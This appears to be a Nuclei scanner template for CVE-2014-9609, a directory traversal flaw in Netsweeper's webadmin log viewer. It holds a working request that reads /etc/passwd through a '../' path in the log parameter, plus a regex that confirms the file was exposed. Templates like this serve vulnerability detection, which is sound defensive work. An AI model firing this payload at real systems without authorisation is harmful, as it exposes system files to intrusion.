nuclei-templates/cves/2014/CVE-2014-9609.yaml

35 lines
1.2 KiB
YAML

id: CVE-2014-9609
info:
name: Netsweeper 4.0.8 - Directory Traversal
author: daffainfo
severity: medium
description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9609
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2014-9609
cwe-id: CWE-22
tags: cve,cve2014,netsweeper,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25